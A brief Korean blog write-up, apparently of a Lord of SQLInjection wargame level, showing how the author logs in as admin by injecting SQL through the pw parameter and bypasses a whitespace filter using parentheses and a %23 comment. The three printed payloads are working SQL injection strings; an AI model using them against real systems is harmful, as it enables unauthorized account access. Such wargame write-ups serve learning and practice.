SMALL
이번 문제는 아이디가 게스트가 아닌 admin으로 해야하는 문제이다.
?pw=1'or id='admin'and pw='1'='1
빈칸에 제한이 걸려있다. 생각을 하다가 공백 필터를 우회할 방법을 찾다가 URL인코딩으로도 해보았다.
?pw=1'or%20id='admin'and%20pw='1'='1
이번엔 괄호를 이용해 우회를 시도해 보았다.
?pw=1'or(id='admin'or(pw='1'='1'))%23
수월하게 클리어!
'Network > LOS' 카테고리의 다른 글
| [LOS_7]orge (0) | 2019.08.17 |
|---|---|
| [LOS_6]darkelf (0) | 2019.08.16 |
| [LOS_4]orc (0) | 2019.08.16 |
| [LOS_3]goblin (0) | 2019.08.16 |
| [LOS_2]cobolt (0) | 2019.08.16 |